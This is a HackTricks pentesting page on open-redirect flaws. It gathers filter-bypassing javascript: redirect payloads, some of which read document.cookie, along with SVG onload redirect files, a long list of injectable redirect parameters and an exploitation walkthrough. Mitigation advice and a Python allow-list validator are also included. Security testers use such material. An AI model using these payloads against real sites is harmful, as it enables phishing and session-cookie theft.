hacktricks/pentesting-web/open-redirect.md
2024-02-11 02:13:58 +00:00


Redirect to localhost or arbitrary domains

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

Open Redirect to XSS

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line comment, so a new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL of PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

Open Redirect by uploading SVG files

Description

Open redirect is a security flaw that lets a user be tricked into clicking a link that sends them to another website. Here we look at the open redirect flaw that occurs when an SVG file is uploaded to a website.

Steps

  1. First, find a website that allows uploading SVG files.
  2. Use a web browser or a security testing tool such as Burp Suite to inspect that website.
  3. Locate the part of the site where SVG files are uploaded.
  4. Upload an SVG file crafted with an open-redirect link. The link should look like this:
<svg onload="location.href='http://www.malicious-website.com'"></svg>
  5. After uploading the SVG file, check whether the open-redirect link worked by looking for a GET request to the malicious site named in the link.

Prevention

To prevent the open redirect flaw, you can take the following steps:

  • Validate and carefully inspect data received from the user before using it as a redirect target.
  • Use link validation methods to ensure the link only redirects to approved sites.
  • Use file and file-type restrictions to prevent uploading dangerous files such as SVG.
  • Keep your software and systems updated and patched to prevent security flaws that can lead to open redirect.
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Common injection parameters

When testing for open redirect vulnerabilities, it is important to understand common injection parameters that can be exploited. These parameters are often found in the URL or in the request body. Here are some common injection parameters to look out for:

  • url: This parameter is used to specify the target URL. Attackers can manipulate this parameter to redirect users to malicious websites.
  • redirect: This parameter is used to specify the redirect URL. Attackers can modify this parameter to redirect users to a different location.
  • next: This parameter is commonly used in login and authentication flows to redirect users after successful authentication. Attackers can abuse this parameter to redirect users to malicious sites.
  • return: Similar to the next parameter, this parameter is used to redirect users after a successful action. Attackers can exploit this parameter to redirect users to malicious destinations.
  • callback: This parameter is often used in JSONP (JSON with Padding) requests to specify a callback function. Attackers can manipulate this parameter to redirect users to malicious sites.

By understanding these common injection parameters, you can effectively test for open redirect vulnerabilities and protect your web applications from potential attacks.

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io

Code examples

.Net

Response.Redirect("~/mysafe-subdomain/login.aspx");

Java

Java is a widely used programming language for developing computer software. It is known for its security and its ability to run on different platforms. Here are some common hacking techniques related to Java:

Open Redirect

Open Redirect is a hacking technique in which a user is sent from one website to another via a deceptive link. This can be done using a URL parameter that lets the user change the final URL.

Often, this technique can be used in various social-engineering attacks, such as tricking a user into clicking a link that leads them to a deceptive site, or tricking a user into entering their secret details on a deceptive site.

For example, if a website has a URL parameter called "redirect", the user can change the final URL by adding a deceptive link. This can lead the user to believe they are being taken to a legitimate site while they are sent to a deceptive site.

To prevent this hacking technique, it is important to thoroughly check URL parameters and ensure the final link stays within the legitimate site.

response.sendRedirect("http://mysafedomain.com");

PHP

Open Redirect

Open Redirect is a vulnerability that allows an attacker to redirect users from a trusted website to a malicious website. This can be exploited by manipulating the URL parameters or user input.

Exploiting Open Redirect Vulnerabilities

To exploit an open redirect vulnerability, follow these steps:

  1. Identify the vulnerable parameter or user input that is used to construct the redirect URL.
  2. Craft a malicious URL by modifying the value of the vulnerable parameter to point to the attacker's website.
  3. Send the malicious URL to the target user, enticing them to click on it.
  4. When the user clicks on the malicious URL, they will be redirected to the attacker's website.

Example

Suppose there is a website that has an open redirect vulnerability in the redirect parameter. The vulnerable URL looks like this:

https://example.com/redirect?url=<redirect_url>

To exploit this vulnerability, an attacker can craft a malicious URL like this:

https://example.com/redirect?url=https://malicious-website.com

When the target user clicks on this URL, they will be redirected to https://malicious-website.com.

Mitigation

To mitigate open redirect vulnerabilities, follow these best practices:

  1. Validate and sanitize user input to prevent malicious URLs from being constructed.
  2. Implement a whitelist approach for redirect URLs, allowing only trusted domains.
  3. Use server-side checks to verify the validity of redirect URLs.
  4. Educate users about the risks of clicking on unknown or suspicious URLs.

By following these practices, you can reduce the risk of open redirect vulnerabilities in your PHP applications.

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
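A redirect-target validator, written here in Python as an added example (not HackTricks code and not the PHP snippet above), showing why the prefix filters that the XSS payload list above defeats fail, and what the allow-list mitigation described in the SVG and PHP sections looks like in practice; ALLOWED_HOSTS and the host names used in the comments are assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: the application's own hosts; only these may be redirect targets.
ALLOWED_HOSTS = {"example.com", "www.example.com"}
DEFAULT_TARGET = "/"

# Control characters and whitespace: the tab and CRLF tricks in the payload list
# above (%09Jav%09ascript:, java%0d%0ascript%0d%0a:) all depend on these.
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")


def naive_is_safe(target: str) -> bool:
    """The kind of filter the payloads above bypass: a literal prefix check."""
    return not target.lower().startswith("javascript:")


def safe_redirect_target(target: str) -> str:
    """Return target if it is a same-site path or an allow-listed https URL,
    otherwise DEFAULT_TARGET. Input is the already URL-decoded parameter value."""
    if _CONTROL_CHARS.search(target):
        return DEFAULT_TARGET
    # Same-site path: exactly one leading '/', so '//host' (scheme-relative)
    # and '/\host' (browsers treat the backslash as '/') are not accepted.
    if target.startswith("/") and not target.startswith(("//", "/\\")):
        return target
    parts = urlsplit(target)
    # Any other scheme, including javascript: and data:, is rejected here.
    if parts.scheme != "https":
        return DEFAULT_TARGET
    # hostname is the part after any userinfo, so 'https://example.com@evil'
    # yields 'evil'; the explicit '@' and backslash checks close the rest.
    if parts.hostname not in ALLOWED_HOSTS or "@" in parts.netloc or "\\" in target:
        return DEFAULT_TARGET
    return target
```

Because the check runs on the decoded parameter, a double-encoded `%250A` reaches it as the literal `%0A` and is rejected by the scheme check rather than the control-character check.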

Tools

Resources